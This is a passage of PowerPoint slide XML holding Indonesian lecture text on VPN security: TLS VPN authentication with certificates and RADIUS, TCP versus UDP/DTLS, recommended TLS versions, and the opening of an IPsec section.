              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lapisan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> transport (TLS) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berarti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>klien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhubung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jauh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sertifikat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> digital. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sertifikat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengidentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> gateway VPN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>klien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>opsional</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>klien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikonfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sertifikatnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sendiri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Hal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> timbal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>balik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, di mana server dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>klien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>saling</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuktikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>identitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. TLS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menciptakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terowongan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terenkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengirimkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kredensial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>autentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Ini </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biasanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diproses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh server RADIUS. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Setelah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diautentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>koneksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sepenuhnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dibuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, gateway VPN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyalurkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>semua</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komunikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>soket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>Nb. VPN TLS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> TCP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> UDP. UDP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>dipilih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>kinerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>sedikit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>unggul</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>terutama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>ketika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>melakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>kanalisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>lalu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>lintas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>sensitif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>latensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>suara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> video. TCP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>mudah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>kebijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> firewall default. TLS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> UDP juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>disebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> Datagram TLS (DTLS).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" b="1" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>Penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>versi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> TLS yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>Versi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>terbaru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>saat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>artikel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>ditulis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> TLS 1.3. TLS 1.2 juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>masih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>didukung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>Versi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>awal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>sudah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>lagi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1"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117</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19000609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Tunneling</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Protokol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Internet</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Lapisan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Transport </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diterapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tingkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Internet Protocol Security (IPsec) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beroperasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lapisan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> model OSI (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lapisan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> 3). Ini </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berarti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
